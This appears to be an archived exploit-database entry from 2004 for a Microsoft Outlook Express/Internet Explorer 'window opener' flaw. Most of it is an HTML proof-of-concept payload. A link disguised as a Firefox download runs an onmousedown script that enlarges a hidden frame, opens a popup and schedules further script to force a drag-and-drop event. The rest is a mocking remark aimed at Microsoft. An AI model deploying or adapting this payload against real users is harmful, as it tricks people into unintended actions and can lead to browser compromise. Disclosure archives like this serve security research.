Microsoft Outlook Express - Window Opener

EDB-ID:

313

CVE:

N/A

Author:

anonymous

Type:

remote

Platform:

Windows

Published:

2004-07-13

Example:

   Alright microsoft. Get your act together. Seriously, this is the 3rd version of this
   vulnerability and we can still cause a drag and drop event.
   Well anyway, to the people that don't design easily exploited software, simply click the link
   on the popup that points to 'The Better Browser' (Hmm, wonder what that could be...) to cause
   a drag and drop event and add it to your favorites. <html> <body> <table width="100%"
   height="100%" border=3><tr><td valign=top> <br><center> Click this link: <a
   href="http://www.mozilla.org/products/firefox/" id=anch
   onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=2000;parent.pop.show(1,1,1,1
   );parent.setTimeout('showalert()',3000);">The <i>Better</i> Browser</a> </td></tr></table>

# milw0rm.com [2004-07-13]